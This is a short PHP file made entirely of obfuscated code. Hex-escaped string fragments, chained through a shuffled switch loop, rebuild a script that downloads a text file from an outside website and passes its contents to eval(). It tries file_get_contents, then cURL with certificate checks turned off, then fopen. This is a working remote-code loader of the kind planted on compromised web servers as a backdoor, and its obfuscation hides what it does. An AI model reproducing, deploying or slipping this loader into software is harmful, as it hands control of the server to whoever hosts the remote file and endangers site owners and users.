<?php
$s=454958; $o=""; while(true) { switch($s) { case 372862: $o.="\x66\x28\x21\x24\x63\x26\x26\x69"; $s=959086; break;
case 323059: $o.="\x2c\x31\x30\x32\x34\x29\x3b\x66"; $s=263388; break;
case 187637: $o.="\x69\x74\x27\x29\x29\x7b\x24\x68"; $s=479409; break;
case 295462: $o.="\x66\x72\x65\x61\x64\x28\x24\x68"; $s=323059; break;
case 901462: $o.="\x6c\x5f\x66\x6f\x70\x65\x6e\x27"; $s=274027; break;
case 568611: $o.="\x61\x6c\x6c\x6f\x77\x5f\x75\x72"; $s=901462; break;
case 308197: $o.="\x6f\x70\x65\x6e\x28\x24\x75\x2c"; $s=238751; break;
case 959086: $o.="\x6e\x69\x5f\x67\x65\x74\x28\x27"; $s=568611; break;
case 907560: $o.="\x29\x3b\x7d\x7d\x7d\x24\x63\x3f"; $s=466974; break;
case 350787: $o.="\x65\x63\x28\x24\x68\x29\x3b\x63"; $s=535590; break;
case 954304: $o.="\x70\x74\x5f\x61\x72\x72\x61\x79"; $s=106852; break;
case 938310: $o.="\x24\x63\x22\x29\x3a\x64\x69\x65"; $s=498878; break;
case 785723: $o.="\x3b"; $s=388264; break;
case 535590: $o.="\x75\x72\x6c\x5f\x63\x6c\x6f\x73"; $s=369213; break;
case 919516: $o.="\x3d\x63\x75\x72\x6c\x5f\x65\x78"; $s=350787; break;
case 352221: $o.="\x21\x24\x63\x29\x7b\x69\x66\x28"; $s=656270; break;
case 176224: $o.="\x69\x74\x28\x24\x75\x29\x3b\x63"; $s=171113; break;
case 388264: eval($o); break 2;
case 653295: $o.="\x3d\x3e\x30\x5d\x29\x3b\x24\x63"; $s=919516; break;
case 654560: $o.="\x24\x68\x29\x29\x24\x63\x2e\x3d"; $s=295462; break;
case 466974: $o.="\x65\x76\x61\x6c\x28\x22\x3f\x3e"; $s=938310; break;
case 718188: $o.="\x31\x33\x3d\x3e\x31\x2c\x36\x34"; $s=653295; break;
case 244113: $o.="\x65\x28\x21\x66\x65\x6f\x66\x28"; $s=654560; break;
case 171113: $o.="\x75\x72\x6c\x5f\x73\x65\x74\x6f"; $s=954304; break;
case 479409: $o.="\x3d\x63\x75\x72\x6c\x5f\x69\x6e"; $s=176224; break;
case 522252: $o.="\x5f\x65\x78\x69\x73\x74\x73\x28"; $s=638051; break;
case 238751: $o.="\x27\x72\x27\x29\x3b\x69\x66\x28"; $s=568717; break;
case 638051: $o.="\x27\x63\x75\x72\x6c\x5f\x69\x6e"; $s=187637; break;
case 684216: $o.="\x28\x24\x75\x29\x3b\x69\x66\x28"; $s=352221; break;
case 274027: $o.="\x29\x29\x7b\x24\x68\x3d\x40\x66"; $s=308197; break;
case 454958: $o.="\x24\x75\x3d\x27\x68\x74\x74\x70"; $s=115875; break;
case 263388: $o.="\x63\x6c\x6f\x73\x65\x28\x24\x68"; $s=907560; break;
case 369213: $o.="\x65\x28\x24\x68\x29\x3b\x7d\x69"; $s=372862; break;
case 106852: $o.="\x28\x24\x68\x2c\x5b\x31\x39\x39"; $s=718188; break;
case 928719: $o.="\x69\x6c\x65\x5f\x67\x65\x74\x5f"; $s=791963; break;
case 557920: $o.="\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; $s=830327; break;
case 568717: $o.="\x24\x68\x29\x7b\x77\x68\x69\x6c"; $s=244113; break;
case 388062: $o.="\x74\x27\x3b\x24\x63\x3d\x40\x66"; $s=928719; break;
case 498878: $o.="\x28\x27\x46\x61\x69\x6c\x27\x29"; $s=785723; break;
case 115875: $o.="\x73\x3a\x2f\x2f\x73\x74\x65\x70"; $s=557920; break;
case 656270: $o.="\x66\x75\x6e\x63\x74\x69\x6f\x6e"; $s=522252; break;
case 830327: $o.="\x6f\x6d\x2f\x37\x37\x2e\x74\x78"; $s=388062; break;
case 791963: $o.="\x63\x6f\x6e\x74\x65\x6e\x74\x73"; $s=684216; break; } }
?>
